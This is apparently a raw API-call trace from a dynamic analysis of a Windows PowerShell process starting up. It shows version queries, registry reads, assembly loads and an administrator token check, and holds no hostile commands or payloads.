	[0636.251] lstrcpyW (in: lpString1=0x367400, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0636.251] CoTaskMemFree (pv=0x367400) 
	[0636.251] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2bb83cc, puLen=0x1ed850) returned 1
	[0636.251] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0636.251] CoTaskMemAlloc (cb=0x20) returned 0x3daa20
	[0636.251] lstrcpyW (in: lpString1=0x3daa20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0636.251] CoTaskMemFree (pv=0x3daa20) 
	[0636.251] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2bb8074, puLen=0x1ed850) returned 1
	[0636.251] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0636.251] CoTaskMemAlloc (cb=0x66) returned 0x3cf3f0
	[0636.252] lstrcpyW (in: lpString1=0x3cf3f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0636.252] CoTaskMemFree (pv=0x3cf3f0) 
	[0636.252] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x0, puLen=0x1ed850) returned 0
	[0636.252] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x0, puLen=0x1ed850) returned 0
	[0636.252] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x0, puLen=0x1ed850) returned 0
	[0636.252] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed828, puLen=0x1ed820 | out: lplpBuffer=0x1ed828*=0x2bb801c, puLen=0x1ed820) returned 1
	[0636.252] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0636.252] VerLanguageNameW (in: wLang=0x0, szLang=0x382120, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0636.252] CoTaskMemFree (pv=0x382120) 
	[0636.252] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\", lplpBuffer=0x1ed878, puLen=0x1ed870 | out: lplpBuffer=0x1ed878*=0x2bb7fa8, puLen=0x1ed870) returned 1
	[0636.263] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0636.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.263] CoTaskMemFree (pv=0x33a4f0) 
	[0638.084] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0638.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.084] CoTaskMemFree (pv=0x33a4f0) 
	[0638.088] lstrlenW (lpString="䅁") returned 1
	[0638.099] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed748 | out: phkResult=0x1ed748*=0x2f8) returned 0x0
	[0638.100] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed738 | out: phkResult=0x1ed738*=0x2fc) returned 0x0
	[0638.100] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed7c8 | out: phkResult=0x1ed7c8*=0x300) returned 0x0
	[0638.105] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed70c, lpData=0x0, lpcbData=0x1ed708*=0x0 | out: lpType=0x1ed70c*=0x1, lpData=0x0, lpcbData=0x1ed708*=0x56) returned 0x0
	[0638.106] CoTaskMemAlloc (cb=0x5a) returned 0x3cf380
	[0638.106] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed6dc, lpData=0x3cf380, lpcbData=0x1ed6d8*=0x56 | out: lpType=0x1ed6dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed6d8*=0x56) returned 0x0
	[0638.106] CoTaskMemFree (pv=0x3cf380) 
	[0638.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0638.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.155] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0640.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.155] CoTaskMemFree (pv=0x33a4f0) 
	[0650.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0650.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0656.079] CoTaskMemAlloc (cb=0x104) returned 0x33a600
	[0656.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.079] CoTaskMemFree (pv=0x33a600) 
	[0656.081] CoTaskMemAlloc (cb=0x104) returned 0x33a600
	[0656.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.081] CoTaskMemFree (pv=0x33a600) 
	[0657.573] CoTaskMemAlloc (cb=0x104) returned 0x33a600
	[0657.573] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.574] CoTaskMemFree (pv=0x33a600) 
	[0657.576] CoTaskMemAlloc (cb=0x104) returned 0x33a600
	[0657.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.576] CoTaskMemFree (pv=0x33a600) 
	[0657.576] CoTaskMemAlloc (cb=0x104) returned 0x33a600
	[0657.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.576] CoTaskMemFree (pv=0x33a600) 
	[0662.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0662.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0664.163] CoTaskMemAlloc (cb=0x104) returned 0x33a600
	[0664.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.163] CoTaskMemFree (pv=0x33a600) 
	[0664.166] CoTaskMemAlloc (cb=0x104) returned 0x33a600
	[0664.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.166] CoTaskMemFree (pv=0x33a600) 
	[0665.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0665.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0681.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0689.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0689.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0701.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0701.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0716.291] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0716.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0716.291] CoTaskMemFree (pv=0x33a820) 
	[0716.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0716.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0716.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0716.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0720.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0720.189] SetErrorMode (uMode=0x1) returned 0x1
	[0720.189] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ed6a0 | out: lpFileInformation=0x1ed6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0720.189] SetErrorMode (uMode=0x1) returned 0x1
	[0727.867] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0727.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.867] CoTaskMemFree (pv=0x33a820) 
	[0727.868] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0727.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.868] CoTaskMemFree (pv=0x33a820) 
	[0727.869] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0727.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.869] CoTaskMemFree (pv=0x33a820) 
	[0727.872] CoCreateGuid (in: pguid=0x1eda68 | out: pguid=0x1eda68*(Data1=0x1629f14d, Data2=0x806d, Data3=0x4cfd, Data4=([0]=0x8d, [1]=0xc9, [2]=0xb2, [3]=0xb, [4]=0xee, [5]=0x96, [6]=0x83, [7]=0xe6))) returned 0x0
	[0727.875] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0727.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.875] CoTaskMemFree (pv=0x33a820) 
	[0727.878] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0727.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.879] CoTaskMemFree (pv=0x33a820) 
	[0727.881] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0727.881] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.881] CoTaskMemFree (pv=0x33a820) 
	[0727.896] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0729.788] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ed710 | out: lpConsoleScreenBufferInfo=0x1ed710) returned 1
	[0729.809] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0729.816] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ed710 | out: lpConsoleScreenBufferInfo=0x1ed710) returned 1
	[0729.817] GetVersionExW (in: lpVersionInformation=0x1ed6a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed6a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0729.820] GetCurrentProcess () returned 0xffffffffffffffff
	[0729.821] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ed738 | out: TokenHandle=0x1ed738*=0x2f8) returned 1
	[0729.825] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed658 | out: TokenInformation=0x0, ReturnLength=0x1ed658) returned 0
	[0729.826] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3472e0
	[0729.826] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x3472e0, TokenInformationLength=0x4, ReturnLength=0x1ed658 | out: TokenInformation=0x3472e0, ReturnLength=0x1ed658) returned 1
	[0729.828] DuplicateTokenEx (in: hExistingToken=0x2f8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ed7b8 | out: phNewToken=0x1ed7b8*=0x300) returned 1
	[0729.828] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed658 | out: TokenInformation=0x0, ReturnLength=0x1ed658) returned 0
	[0729.828] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x347290
	[0729.828] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x347290, TokenInformationLength=0x4, ReturnLength=0x1ed658 | out: TokenInformation=0x347290, ReturnLength=0x1ed658) returned 1
	[0729.829] CheckTokenMembership (in: TokenHandle=0x300, SidToCheck=0x2ba43a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ed7c8 | out: IsMember=0x1ed7c8) returned 1
	[0729.829] CloseHandle (hObject=0x300) returned 1
	[0729.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0729.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0729.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0729.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.738] CoTaskMemAlloc (cb=0x804) returned 0x1b3e4210
	[0731.738] GetConsoleTitleW (in: lpConsoleTitle=0x1b3e4210, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0733.381] CoTaskMemFree (pv=0x1b3e4210) 
	[0733.410] CoTaskMemAlloc (cb=0x804) returned 0x1b3e4ac0
	[0733.410] GetConsoleTitleW (in: lpConsoleTitle=0x1b3e4ac0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0733.411] CoTaskMemFree (pv=0x1b3e4ac0) 
	[0733.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0733.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0733.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0733.413] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0734.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0734.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0734.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
